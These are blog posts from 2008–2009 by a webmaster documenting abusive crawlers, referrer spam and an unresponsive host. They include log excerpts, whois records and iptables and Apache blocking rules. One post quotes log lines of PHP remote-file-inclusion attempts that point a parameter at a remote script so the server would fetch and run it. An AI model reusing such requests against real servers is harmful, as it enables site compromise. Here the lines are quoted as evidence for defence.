electro acoustic expressionism
nodepet
January 16th, 2009

bigfinder – another perfect match for the filters

Filed under: Web — olliver @ 12:07 h

One would think a search engine has a vital interest in not becoming a nuisance to webmasters if it tries to advertise paid listings for websites. In this case, any form of Black Hat SEO directed at potential webmasters should immediately backfire. And if someone does opt for Black Hat SEO, then one would probably do it right in order not to endanger one’s money backend. Neither can be said about an outfit calling themselves bigfinder.de, which were hitting my blog this morning from an ip range I must have overlooked (probably because no flavour of abuse had originated from there). Anyway, time to put up some evidence from the logfiles:

83.133.125.202 – - [16/Jan/2009:06:18:34 +0100] www.nodepet.com “GET / HTTP/1.0″ 200 42235 “-” “-”
83.133.125.202 – - [16/Jan/2009:06:18:35 +0100] www.nodepet.com “GET / HTTP/1.0″ 200 42235 “-” “-”
83.133.125.202 – - [16/Jan/2009:06:18:41 +0100] www.nodepet.com “GET / HTTP/1.1″ 200 42235 “http://www.BigFinder.de/” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de)”
83.133.125.202 – - [16/Jan/2009:06:18:41 +0100] www.nodepet.com “GET / HTTP/1.0″ 200 42235 “-” “-”
83.133.125.202 – - [16/Jan/2009:06:18:42 +0100] www.nodepet.com “GET / HTTP/1.0″ 200 17642 “-” “-”
83.133.125.202 – - [16/Jan/2009:07:00:39 +0100] www.nodepet.com “GET / HTTP/1.1″ 200 17642 “http://www.bigfinder.de/index.php” “T-Online Browser (Windows NT 5.1; U; de)”
83.133.125.202 – - [16/Jan/2009:08:04:08 +0100] www.nodepet.com “GET / HTTP/1.1″ 200 17642 “http://www.bigfinder.de/index.php” “Mozilla/3.01 (compatible;)”

As you can see, the bot does not look for robots.txt, constantly changes its user agent string and leaves fake referrers pointing at bigfinder.de. To me, this looks like referrer spam with badly falsified browser strings and the target sitting on the same address as the bot:

olliver@bunkiten:~$ host www.bigfinder.de
www.bigfinder.de has address 83.133.125.202

So who are bigfinder.de and what is their mission? According to http://www.bigfinder.de/ueber.php some firm called projectnet run by Gert Kambartel is behind this operation. Their goals look quite interesting (as in peculiar):

Vorbei sind die Zeiten der “Ranking-Olympiaden” !!!

Bei BigFinder.de gibt es kein Ranking mehr. Hier hat jeder Eintrag die gleiche Chance, gefunden zu werden. Die Einträge werden gemäß der eingegebenen Suchworte per Zufall ermittelt. Das heißt, daß keine Einträge mehr für “ewig” auf den vordersten Plätzen stehen. Jeder Eintrag wird statistisch gesehen genau so oft angezeigt, wie die anderen, egal, wie “groß” oder wie “bekannt” eine Seite ist.

(source: http://www.bigfinder.de/ueber.php)

This translates to:

Gone are the days of “ranking olympics” !!!
At Bigfinder.de a ranking no longer exists. Here, each entry has the same chance of being found. Entries are randomly determined according to the given keywords. That is, no longer are results on top positions “eternally”. Each entry is, statistically seen, displayed as often as any other, no matter how “large” or “known” a site is.

The notion I dislike is that there is some elite hogging up the search engines and this would be the only reason for some sites not to be found in search engines. Also this begs the notion of each site delivering the same degree of relevance for a search query, which is of course far from reality. Quite unsurprisingly, under http://www.bigfinder.de/mieten1.php you can find the bait for a guarantueed listing:

Können Sie sich vorstellen, in der größten und bekanntesten Suchmaschine auf Platz 1, 2 oder 3 zu stehen? Sie würden eine ungeahnte Menge an Besuchern auf Ihre Webseite bekommen. Davon träumen mit Sicherheit Millionen von Webseitenbetreibern, die alle etwas auf ihrer Webseite anzubieten haben.

(source: http://www.bigfinder.de/mieten1.php)

translation:

Could you imagine being listed at first, second or third position in the largest and best known search engines? You would get an inconceivable amount of visits to your website. Surely that is something millions of webmasters who offer something on their website are dreaming of.

Obviously, this is based on the notion that top ranking for any keyword results in a lot of traffic. High traffic only applies to top positions for highly competitive terms and even that does not automatically mean a high conversion rate for commercial websites. And there lies the core of the problem: ultimately it is the website and its content that matters.

And finally:

Und genau so funktioniert die Top-Positionierung bei BigFinder.de.
Sie mieten einen oder mehrere für Sie wichtige Suchbegriffe für je 10,00 EUR/Jahr (zuzgl. 19,00 % MwSt.)! Jedesmal, wenn dann ein User nach diesem Begriff sucht, erscheint Ihre Webseite auf einem der Plätze 1-3 in der Trefferliste.

(source: http://www.bigfinder.de/mieten1.php)

translation:

And this is how top-ranking at bigfinder.de works:
You rent one or several search terms that matter to you for Euro 10.00 per year (incl. 19.00 % VAT)! Each time a user is looking for this term your website will appear on one of the top three positions in the results returned.

So as a summary, bigfinder.de wants to make people believe that sponsored and organic search results are identical and top rankings in any search engine automatically result in lots of traffic. There is also the implication that each site is of the same quality and can convert traffic to sales equally. To me, this is clearly aiming at easily gullible folks with little knowledge about how the web actually works. Furthermore, there is a financial incentive for this “search engine” to leave phony marks in webmasters’ server logs.

Looking more closely, I wonder why the search engine has to prominently display the amount of domains and supposed number of concurrent visitors on its pages:

13.491.148 Domains, 169 Besucher online

(this is what it claimed at 10:38 h CET)

Combine this with the hourly fake visits and you cannot exclude the possibility that someone is trying to artificially inflate one’s relevance by means of fake numbers and visitors. This is something regulars of a major SEO forum in Germany have been wondering about for a while, too:

I once contacted this guy via email. This guy was snotty and proud of his peculiar site.

I sent him a list of prohibited sites. Since then, I no longer received “pseudo requests”.

translation by me, original source: BigFinder replaces OttoSuch (in German only)

Hello,
I own a homepage and noticed in my web statistics that some visitors originated from bigfinder.de. I then went to their site and rented several keywords for 10 Euros a year.

Now there are more “visitors” who reach my homepage via BigFinder. However, I suspect that BigFinder’s clicks on my site are automatically generated.

Not a single customer came to me this way. Via Google there are several regularly. I assume that this is technically feasible without any effort. But does anyone of you know more about that? Do other users suspect manipulation, too?

Does anyone know anything helpful about it?

translation by me, original source: Bigfinder Search Engine (in German only)

Like I wrote in my introduction: In case this is really a scam, it would be rather silly to have all requests originated from the same ip address as the official website and use badly faked browser strings. On the other hand, there is still a huge market of technically challenged and easily gullible webmasters who might end up paying the rent without getting anything in return. However, I don’t know whether it is a scam. There is merely some evidence suggesting that this search engine is intentionally planting fake referrers and there is a financial incentive for doing so. Additionally, there seems to be some kind of agreement that this engine does not result in real human visits, but even this might be the result of a biased sample.

What I do know, however, is that this bot exhibits an inacceptable behaviour and as it does not obey robots.txt there is no other way to opt out except of denying access to one’s website (or entire server).

Whois suggests the following about the ip range:

inetnum: 83.133.96.0 - 83.133.127.255
netname: LNCDE-GREATNET-NEWMEDIA
descr: Greatnet New Media.
country: DE
admin-c: FL1331-RIPE
tech-c: FL1331-RIPE
status: ASSIGNED PA
mnt-by: LNC-MNT
mnt-lower: LNC-MNT
source: RIPE # Filtered

person: Frazzetta Lindner
address: Greatnet New Media
address: Brentenstrasse 4a
address: D-83734 Hausham
address: Germany
phone: +49 1805 47328638
fax-no: +49 1805 444894696
nic-hdl: FL1331-RIPE
abuse-mailbox: abuse at greatnet.de
mnt-by: LNC-MNT
source: RIPE # Filtered

Greatnet is a German hosting outfit offering everything from websites to colocation, so they are safe to block without accidentally locking out human visitors. Plus you never know whether at some point in the future scrapers or web spammers will make this place their home and so the best prevention is to block first and make exceptions later.

Apache users on shared hosting may like to add

Deny from 83.133.96.0/19

to .htaccess or httpd.conf

Dedicated server owners may instead prefer to get rid of the noise altogether:

iptables -A INPUT -s 83.133.96.0/19 -i eth0 -p tcp -m tcp --syn -j REJECT

or the BOfH variant:

iptables -A INPUT -s 83.133.96.0/19 -i eth0 -j DROP

Comments (6)

December 28th, 2008

Sphere adding query strings to search results

Filed under: Web — olliver @ 22:58 h

During my usual daily administrative tasks, I was less than pleased to discover that someone at Sphere apparently came up with a new idea. Or perhaps that idea has been around for quite a long time and I was merely fortunate enough to have been spared from learning of its existence. For those who do not know what I am referring to, here is a short explanation:

Sphere offer a widget for blogs that tries to present related blogposts for a particular subject. Perhaps not a bad idea in itself, maybe even a boon to those who want to research a subject and have a handy tool to consult more than one source prior to adding their own thoughts. However there seem to be some issues:
To these links a referer=sphere_search query string is appended. Even worse, it seems that other search engines are encouraged to crawl these modified links. As the search engine bot cannot differentiate between a useless query string and one that has been added on purpose, it will treat the original and the modified link as two separate pages showing the same and ultimately this can lead to the receiving end being hit by dreaded duplicate content penalties.

Google demonstrates that quite a few sites now have to put up with indexed pages they never wanted to have this way:
http://www.google.com/search?q=inurl:referer=sphere_search

This pretty much looks to me like some marketing expert had the brilliant idea of introducing the referrer tracking model of the adult content industry to the mainstream without the affected webmasters’ consent. If you have been hit by this nonsense too, you can easily spot it in your logfiles, like I did this morning:

66.249.73.232 – - [28/Dec/2008:11:18:13 +0100] “GET /goals-for-2008-revisited?referer=sphere_search HTTP/1.1″ 301 – “-” “Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)”
66.249.73.232 – - [28/Dec/2008:11:18:14 +0100] “GET /goals-for-2008-revisited/?referer=sphere_search HTTP/1.1″ 200 11189 “-” “Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)”

You may notice that the first request omitted the terminating slash of the uri, a bad habit Sphere’s bot has been exhibiting for years without anyone bothering to fix it. Now the hassle of addressing these malformed requests in order to limit the damage they can do has been added to the mix. Apache users may like to use a Mod Rewrite rule similar to this to work around the problem:

# broken sphere search
RewriteCond %{QUERY_STRING} .
RewriteCond %{QUERY_STRING} ^referer=sphere [NC]
RewriteRule (.*) http://www.example.com/$1/? [R=301,L]

I assume you know how to use Mod Rewrite, in case you don’t, please google for the basics before using this code, as inappropriate usage without understanding the implications can cause havoc to a server. Here is a brief explanation of what it does:

At first it is checked wether a query string is present and if so, whether it contains a value beginning with “referer=sphere”. If so, it will force a 301 redirect that strips this query string and re-adds the omitted terminal slash of our fake directory path. This is done by appending the question mark at the end of the variable. Now when disaster struck one of our pages, bots can be led to the actual source no matter what rubbish was originally picked up.

Of course this is merely curing symptoms. The source of the problem is this moronic addition of a query string which can only be fixed by Sphere. Surely I’m not the only one on this planet who feels annoyed by such nonsensical additions and perhaps in the end you can only opt out from their crawling:

The responsible outfit is located in this little corner of the web:

Votenet Solutions Inc, SAVV-S234898-5 (NET-64-14-117-224-1)
64.14.117.224 - 64.14.117.255

which equates to 64.14.117.224/27.

Opt-out can be understood in five ten fiftyfold ways:
One may add an entry to robots.txt, another to .htaccess or httpd.conf (depending on shared/dedicated hosting) and freaks like me prefer using iptables, so they need not see the clutter of failed requests in their logfiles:

# sphere.com: broken link generation
iptables -A INPUT -s 64.14.117.224/27 -i eth0 -j DROP

That should put an end to the affiliate link mess.

Comments (2)

December 8th, 2008

Logical.net – abuse reports discouraged

Filed under: Web — olliver @ 13:50 h

I merely meant to be helpful when I took the time to notify logical.net of a compromised server possibly running an unpatched cPanel version that was hitting one of the servers I adminster with attempts at php remote inclusions:

209.23.116.97 – - [08/Dec/2008:11:55:28 +0100] “GET //admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1″ 403 217 “-” “Mozilla/5.0″
209.23.116.97 – - [08/Dec/2008:11:55:28 +0100] “GET /category//admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1″ 403 227 “-” “Mozilla/5.0″
209.23.116.97 – - [08/Dec/2008:11:55:28 +0100] “GET /category/spam/%20%20//admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1″ 403 235 “-” “Mozilla/5.0″
209.23.116.97 – - [08/Dec/2008:11:55:31 +0100] “GET /category/spam//admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1″ 403 232 “-” “Mozilla/5.0″
209.23.116.97 – - [08/Dec/2008:11:56:17 +0100] “GET /failed-blogspam-automation-from-china//admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1″ 403 256 “-” “Mozilla/5.0″
209.23.116.97 – - [08/Dec/2008:11:56:17 +0100] “GET /failed-blogspam-automation-from-china/%20%20//admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1″ 403 259 “-” “Mozilla/5.0″

209.23.116.97 has a PTR record of cpanel.acmenet.net, which looks quite telling in my opinion.

When looking up the address, I noticed that logical net did not differentiate between ranges for Internet service to endusers and webhosting, so unless you scan PTR records you may have no way of telling them apart, just one block for everything:

OrgName: Logical Net Corporation
OrgID: LNC
Address: 1593 Central Ave.
City: Albany
StateProv: NY
PostalCode: 12205
Country: US

NetRange: 209.23.0.0 – 209.23.127.255
CIDR: 209.23.0.0/17
NetName: LNET-A
NetHandle: NET-209-23-0-0-1
Parent: NET-209-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.LOGICAL.NET
NameServer: NS2.LOGICAL.NET
NameServer: NS3.LOGICAL.NET
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 1999-03-12
Updated: 2001-05-30

Nor could their routing give any more hints (sometimes it does):

route: 209.23.0.0/17
origin: AS3931
descr: LOGICAL – Logical Net Corporation
lastupd-frst: 2008-11-14 00:00Z 80.81.192.106@rrc12
lastupd-last: 2008-12-08 03:29Z 145.125.80.5@rrc00
seen-at: rrc00,rrc01,rrc04,rrc05,rrc06,rrc07,rrc10,rrc11,rrc12,rrc13,rrc14,rrc15,rrc16
num-rispeers: 96
source: RISWHOIS

According to whois, they at least have an abuse address and one is tempted to think, that it would be added for a reason other than looking “anti-spam”. As I soon had to discover right after having sent my abuse report, this does not seem to be the case with logical.net. Here is the automatically ignore bot reply I instantly received from them:

From: “Support” <support @ logical.net>
To: [some address]@gmail.com
Reply-To: support @ logical.net
Subject: Registration Required: Unable to create Ticket
Date: Mon, 08 Dec 2008 06:48:35 -0500
X-Mailer: Kayako eSupport v3.20.02

Your ticket has not been accepted into the system. You are required to register at the following URL to submit any issues via Email: help.logical.net/index.php?_m=core&_a=register If you already have a registered account under a different email address you may log into our ticketing system Here: http://help.logical.net/

Once registered, you will be able to submit any issues directly by sending us Email. We are sorry for any inconvenience this may have caused.

Support

Note that I did write to abuse and got a reply from support instead. However, I did not ask for their help, as I already know how to adjust my defences in order to rid myself of neglegent, ignorant or even malicious network owners. I merely sent out a courtesy notice as I figured a compromised cPanel may be some kind of desaster for those who maintain their servers/domains with it. But apparently I was mistaken. Do Logical.net really believe to be so special that I happily would jump through their hoops just to notify them of their own negligence (notice the absurdity)? I can’t believe anyone right in one’s mind would cherish such a crazy notion, therefore I conclude third party notifications are not desired by logical.net, which is their right (aka their network, their rules). As it is mine to refuse traffic coming from their direction.

How to block them accessing my webservers without affecting innocent dial-up or DSL users? I spent some time looking up PTR records and noticed that the /24 which the compromised machine is part of, is exclusively populated by servers, mainly mailservers, but some webservers, too. The same applies to the neighbouring /24 so I resolved the problem by adding the following entry to both my mail- and webservers:

# logical.net do not wish to receive abuse reports
iptables -A INPUT -s 209.23.116.0/23 -i eth0 -p tcp -m tcp --syn -j REJECT

This way, if one of their mailservers should suddenly opt for spewing spams, I have the piece of mind of not being confronted with it. Or think of a moronic implementation of some autoresponder or challenge/response system which could be abused by spammers for hitting innocent bystanders with tons of backscatter.

Comments (0)

September 30th, 2008

dotbot – yet another useless robot…

Filed under: Web — olliver @ 10:36 h

Allow me to start with a question: What is the purpose of a legitimate robot? One would think it is fetching content at a reasonable pace whilst respecting the host’s restrictions in robots.txt. When a bot bothers to fetch robots.txt prior to its crawling, does that signify it will also process its rules? Not necessarily it seems. When Dotbot visited me two days ago, it did not seem to be interested in my content, but in collecting redirect messages without following them:

208.115.111.245 – - [28/Sep/2008:08:53:50 +0200] “GET /robots.txt HTTP/1.1″ 200 77 “-” “Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)”
208.115.111.245 – - [28/Sep/2008:08:58:00 +0200] “GET /category/life HTTP/1.1″ 301 – “-” “Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)”
208.115.111.245 – - [28/Sep/2008:08:58:04 +0200] “GET /category/music HTTP/1.1″ 301 – “-” “Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)”
208.115.111.245 – - [28/Sep/2008:08:58:08 +0200] “GET /category/photo HTTP/1.1″ 301 – “-” “Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)”
208.115.111.245 – - [28/Sep/2008:08:58:13 +0200] “GET /category/spam HTTP/1.1″ 301 – “-” “Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)”
208.115.111.245 – - [28/Sep/2008:08:58:18 +0200] “GET /category/web HTTP/1.1″ 301 – “-” “Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)”

This is just a small but representative sample: For reasons unknown to me the Dotbot omits the terminal slash of the URI which results in a 301 redirect (because there is no file of that name). Now if only the spider followed it, so that it could fetch something meaningful. To cut a long story short, except for robots.txt, there was not a single article this bot took home, because the robot obviously does not know how to handle redirects. Quite a silly waste of resources in my opinion, but then again, what do I know about the bot’s purpose?

On the DotNetDotCom website, the crawler’s presumable home, we can find the following statement:

Hi! Thanks for letting us crawl you!

We are just a few Seattle based guys trying to figure out how to make internet data as open as possible. You should be able to find everything you are looking for below. If not feel free to contact us. Happy Surfing!

The “we are just …” statement does not raise much confidence in me. This impression is amplified by the next paragraph, which contains an instruction about how to get rid of the bot:

1. First and foremost, curse our name. Trust us, it will feel good. Now breath gently…
2. Create a simple text file named robots.txt and place it in your server’s root directory. (http://www.yoursite.com/ «– Right There!)
3. Add the following code to your robots.txt file:
User-agent: dotbot
Disallow: /
4. Reflect on how easy that was.

To me this does not sound like a responsible operation, because it suggests that rather than fixing their bot, they urge “flamers” to opt-out from their crawling. Regulars will know I am one of these flamers ;-) and of course this is not the only reason for my scepticism:

208.115.111.245 – - [28/Sep/2008:11:13:52 +0200] “GET /robots.txt HTTP/1.1″ 200 77 “-” “Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)”
208.115.111.245 – - [28/Sep/2008:11:19:32 +0200] “GET /impressum HTTP/1.1″ 301 241 “-” “Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)”

Impressum is explicitly excluded from crawling in robots.txt because it contains sensitive information about me that I am required to put up by German law. Yet, despite reading robots.txt DotBot chose to jump right onto it. Fortunately again failing to add a trailing slash to its request and handle the resulting 301 redirect properly. This is usually a KO criterion for a bot and since experience has proven time and again that bad bots have a tendency of morphing I prefer to firewall them right away.

Whois opines the following about their address space:

OrgName:    dotnetdotcom.org
OrgID:      DOTNE
Address:    93 S. Jackson Street #10070
City:       Seattle
StateProv:  WA
PostalCode: 98104-2818
Country:    US

NetRange:   208.115.111.240 - 208.115.111.255
CIDR:       208.115.111.240/28
OriginAS:   AS23033
NetName:    208-115-111-240-SLASH28
NetHandle:  NET-208-115-111-240-1
Parent:     NET-208-115-96-0-1
NetType:    Reassigned
Comment:
RegDate:    2008-07-21
Updated:    2008-07-21

I am not suggesting the DotNetDotCom owners are blackhats. But I have better things to do in my life then to debug other people’s bot operation. If DotBot even fails at elementary things like following robots.txt and redirects then I do not see to allow it to visit my sites. Blocking 208.115.111.240/28 should take care of the problem.

Comments (0)

June 29th, 2008

Who are behind WebDataCentreBot?

Filed under: Web — olliver @ 23:52 h

It does not pay not to preemptively block ranges known to be occupied by popular hosting companies, unless you want to have fun with non behaving or fake bots. The pleasure of me enjoying the WebDataCentreBot was rather accidental as I was lazy in terms of blocklisting any SoftLayer ranges, so that these may not be able to do anything but sending mail to or receiving mail from me.

Sitting on 67.228.177.87 and announcing itself as:

Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)

Not only did it jump right in to start indexing without bothering in the slightest about robots.txt, but also happily accepted content that was explicitly excluded from robots.txt. But then again, how should it know without reading it in the first place? Well, I thought perhaps they want to learn about the broken behaviour of their bot and fix it, but looking at their site webdatacentre.com, all I can find is:

Web Data Centre

Web Data Centre is an internet research project driven by a small team of researchers from different parts of the world. Its aim is to get a better understanding of the link structure of the web. More info is coming shortly.

(front page as of June 29th 2008)

And that was it. No point of contact whatsoever and looking at the registration data, things turn out to look pretty spammy:

Domain Name: WEBDATACENTRE.COM

Registrant [1435225]:
        Moniker Privacy Services
        20 SW 27th Ave.
        Suite 201
        Pompano Beach
        FL
        33069
        US

Administrative Contact [1435225]:
        Moniker Privacy Services WEBDATACENTRE.COM @ domainservice.com
        Moniker Privacy Services
        20 SW 27th Ave.
        Suite 201
        Pompano Beach
        FL
        33069
        US
        Phone: +1.9549848445
        Fax:   +1.9549699155

Billing Contact [1435225]:
        Moniker Privacy Services WEBDATACENTRE.COM @ domainservice.com
        Moniker Privacy Services
        20 SW 27th Ave.
        Suite 201
        Pompano Beach
        FL
        33069
        US
        Phone: +1.9549848445
        Fax:   +1.9549699155

Technical Contact [1435225]:
        Moniker Privacy Services WEBDATACENTRE.COM @ domainservice.com
        Moniker Privacy Services
        20 SW 27th Ave.
        Suite 201
        Pompano Beach
        FL
        33069
        US
        Phone: +1.9549848445
        Fax:   +1.9549699155

Domain servers in listed order:

        NS1.DOMAINSERVICE.COM         67.99.176.12
        NS2.DOMAINSERVICE.COM         67.97.247.209
        NS3.DOMAINSERVICE.COM         64.49.213.231
        NS4.DOMAINSERVICE.COM         67.97.247.210

        Record created on:        2008-06-27 05:46:23.0
        Database last updated on: 2008-06-27 05:46:39.373
        Domain Expires on:        2009-06-27 05:46:41.0

Registered a mere two days ago and hiding behind an anonymous privacy shield. Why would a business want to remain anonymous unless it has to conceal something? One also might expect a search engine to reveal its legitimacy by having a meaningful rDNS name that reflects the bot’s name, but nothing much to find here either:

olliver@bunkiten:~$ host 67.228.177.87
87.177.228.67.in-addr.arpa domain name pointer midphase.com.

Midphase.com is the generic PTR record of a Softlayer reseller:

%rwhois V-1.5:003fff:00 rwhois.softlayer.com (by Network Solutions, Inc. V-1.5.9.5)
network:Class-Name:network
network:ID:NETBLK-SOFTLAYER.67.228.160.0/19
network:Auth-Area:67.228.160.0/19
network:Network-Name:SOFTLAYER-67.228.160.0
network:IP-Network:67.228.177.0/24
network:IP-Network-Block:67.228.177.0-67.228.177.255
network:Organization;I:Hosting Services Inc.
network:Street-Address:223 West Jackson Blvd STE# 1014
network:City:Chicago
network:State:IL
network:Postal-Code:60606
network:Country-Code:US
network:Tech-Contact;I:sysadmins @ softlayer.com
network:Abuse-Contact;I:abuse @ midphase.com
network:Admin-Contact;I:IPADM258-ARIN
network:Created:20080128
network:Updated:20080324
network:Updated-By:ipadmin @ softlayer.com

An aggregated range of consecutive ip addresses registered to the bot building outfit would seem more practical, especially to direct complaints to the appropriate persons. However, there is no info about the number of ip addresses in use by this anonymous entity, which effectively helps Midphase’s publicity shy customers remain anonymous. Putting all together, it seems more likely to assume they are content/email/webform seeking spammers building a list for themselves or to sell to other spammers than an actual search engine. Even if I am all mistaken, I am still not particularly keen on bots that do ignore established standards like robots.txt. Absent any communication channels one has to conclude that one may not be able to opt out from their crawling by ordinary means.

Therefore, firewalling this particular range seems an appropriate solution to me:

iptables -A INPUT -s 67.228.177.0/24 -i eth0 -p tcp -m tcp ! --dport 25 --syn -j REJECT

This rule rejects all incoming TCP traffic except for SMTP, as there may be legit sites we like to receive mail from or sent mail to. We have to specify that only incoming syn packages be rejected, because otherwise outgoing mail to this address range would remain stuck in our queue and never got delivered. If this potential need for communication is not an issue to be worried of, one still can apply the BOfH method and drop the range altogether:

iptables -A INPUT -s 67.228.177.0/24 -i eth0 -j DROP

Apache servers may also be happy about another SetEnvIfRule, preferably in httpd.conf/apache2.conf or .htaccess if the former is not an option due to a shared hosting account:

SetEnvIfNoCase User-Agent "WebDataCentre(Bot|\.com)" block

Deny from env=block

Update July 1st, 2008:

The bot has been spotted with another ip address, 66.150.224.245, this time without any rDNS record at all:

olliver@bunkiten:~$ host 66.150.224.245
Host 245.224.150.66.in-addr.arpa. not found: 3(NXDOMAIN)

Familiar set up, within a /24 of a presumable Internap reseller and still without any details concerning the company/project.

CustName:   Networld Internet Services
Address:    P.O box 551
City:       Skippack
StateProv:  PA
PostalCode: 19474
Country:    US
RegDate:    2007-01-16
Updated:    2007-01-16

NetRange:   66.150.224.0 - 66.150.224.255
CIDR:       66.150.224.0/24
NetName:    INAP-PHI-NETWORLDINT-12098
NetHandle:  NET-66-150-224-0-1
Parent:     NET-66-150-0-0-1
NetType:    Reassigned
Comment:
RegDate:    2007-01-16
Updated:    2007-01-16

RTechHandle: INO3-ARIN
RTechName:   InterNap Network Operations Center
RTechPhone:  +1-877-843-4662
RTechEmail:  noc @ internap.com 

OrgAbuseHandle: IAC3-ARIN
OrgAbuseName:   Internap Abuse Contact
OrgAbusePhone:  +1-206-256-9500
OrgAbuseEmail:  abuse @ internap.com

OrgTechHandle: INO3-ARIN
OrgTechName:   InterNap Network Operations Center
OrgTechPhone:  +1-877-843-4662
OrgTechEmail:  noc @ internap.com

In case you want to add another iptables rule based on the sample further above, simply replace 67.228.177.0/24 with 66.150.224.0/24 and you should be set.

Update July 4th, 2008

Another sighting, this time crawling from Sweden using 77.110.52.67 as ip address:

olliver@bunkiten:~$ host 77.110.52.67
67.52.110.77.in-addr.arpa is an alias for 77-110-52-67.univation.riksnet.nu.
77-110-52-67.univation.riksnet.nu domain name pointer ip67.univation.riksnet.nu.

So the pattern of using generic rDNS records obviously persists, as does their ignorance concerning robots.txt.

Whois:

inetnum:        77.110.52.64 - 77.110.52.79
netname:        SE-RIKSNET-UNIVATION2
descr:	        Stockholm Univation AB site2
country:        SE
admin-c:        BEER3-RIPE
tech-c:         BEER3-RIPE
status:         ASSIGNED PA
mnt-by:         MNT-RIKSNET
mnt-lower:      MNT-RIKSNET
mnt-routes:     MNT-RIKSNET
source:         RIPE # Filtered

person:         Bengt Erik Sandstrom
address:        Graddvagen 7
address:        S-906 20 Umea
address:        Sweden
phone:          +46 768 272022
nic-hdl:        BEER3-RIPE
source:         RIPE # Filtered

That range would translate to 77.110.52.64/28, a rather small block this time, and this is also the value you would like to use for blocking them via iptables or other means.

Comments (14)

March 10th, 2008

BioSearch bot: pointless POST requests

Filed under: Web — olliver @ 23:52 h

I really do not know what this bot is trying to accomplish, but it looks rather pointless:

66.167.105.59 - - [10/Mar/2008:04:47:50 +0100]
"POST / HTTP/1.1" 403 210 "-" "BioSearch"
66.167.105.59 - - [10/Mar/2008:04:47:51 +0100]
"POST /robots.txt HTTP/1.1" 403 220 "-" "BioSearch"

You would only use POST for submitting form data, but not retrieving data. Apart from that, the request order is wrong: A bot should first ask for robots.txt and then, depending on the outcome, either go away or start indexing.

Unfortunately the netblock, where this brainless wonder resides, does not reveal any details about the bot’s owner:

[rwhois.covad.net]
%rwhois V-1.5:003fff:00 rwhois.covad.com (by Network Solutions, Inc. V-you-guess)
network:Class-Name:network
network:Auth-Area:66.167.0.0/16
network:ID:NETBLK-NONE-66-167-0-0.66.167.0.0/16
network:Network-Name:NONE-66-167-0-0
network:IP-Network:66.167.0.0/16
network:In-Addr-Server;I:ns3.covad.com
network:In-Addr-Server;I:ns4.covad.com
network:IP-Network-Block:66.167.0.0 - 66.167.255.255
network:Org-Name:Covad Communications
network:Street-Address:110 Rio Robles
network:City:San Jose
network:State:CA
network:Postal-Code:95134
network:Country-Code:US
network:Tech-Contact;I:ipadmin covad.com
network:Admin-Contact;I:ipadmin covad.com
network:Created:20030508150409000
network:Updated:20041506165200000

The rDNS of the offending ip address is not more talkative either:
h-66-167-105-99.lsanca54.dynamic.covad.net
This reads to me like Los Angeles/California.

Although there is a company in California called Biosearch Technologies, they are unrelated to the bot, as they are only offering products derived from their biological research and are based in the San Francisco area. So it seems to be just a broken anonymous bot which is safe to block.

Comments (0)

January 22nd, 2008

IE 6.0 omits trailing slash for webroot requests

Filed under: Web — olliver @ 10:53 h

Just when you think it could not happen, it does anyway…
I have just discovered that Internet Explorer 6.0 has the habit of omitting the trailing slash of a domain name, whenever it is not explicitly appended in a request. This only works for requests of the webroot (like www.example.com), because in all other cases Apache will automatically launch a 301 redirect to the url version with a trailing slash. This is irritating to me because all other browsers will automatically add the trailing slash if it is missing.

Here are some log entries to illustrate what it looks like when you omit the slash of the domain name:

192.168.0.16 - - [22/Jan/2008:09:42:11 +0100] "GET / HTTP/1.1"
200 41369 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
192.168.0.16 - - [22/Jan/2008:09:42:13 +0100]
"GET /wp-content/themes/nodepet/style.css HTTP/1.1"
304 - "http://www.nodepet.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"

I marked the referrer string as bold. By sending this broken referrer string, IE is likely to break scripts which rely on the usual behaviour (i.e. referrer checker against hotlinking or script automation) and deny access to legit visitors. Curiously, if you do add the slash to your request from the start, IE 6.0 will behave like any other browser:

192.168.0.1 - - [22/Jan/2008:09:48:16 +0100] "GET / HTTP/1.1"
200 41369 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
192.168.0.1 - - [22/Jan/2008:09:48:17 +0100]
"GET /wp-content/themes/nodepet/style.css HTTP/1.1"
304 - "http://www.nodepet.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"

Up to now I thought a good indicator for a bot generated fake referrer is the missing slash and would make a good SetEnvIf rule to deny access on, however now it seems like this approach is generating false positives. On the other hand, by loosening the check, I open the up the flood gates for spambots, which is not really something I am keen on.

Comments (0)

January 11th, 2008

IE6.0 bug: horizontal scrollbars using italic fonts

Filed under: Web — olliver @ 16:22 h

I came across this weird bug whilst tweaking my site and could not find any website mentioning it. Or maybe I am too silly to use the right wording for my search queries as I cannot imagine that I am the first person to have noticed it.

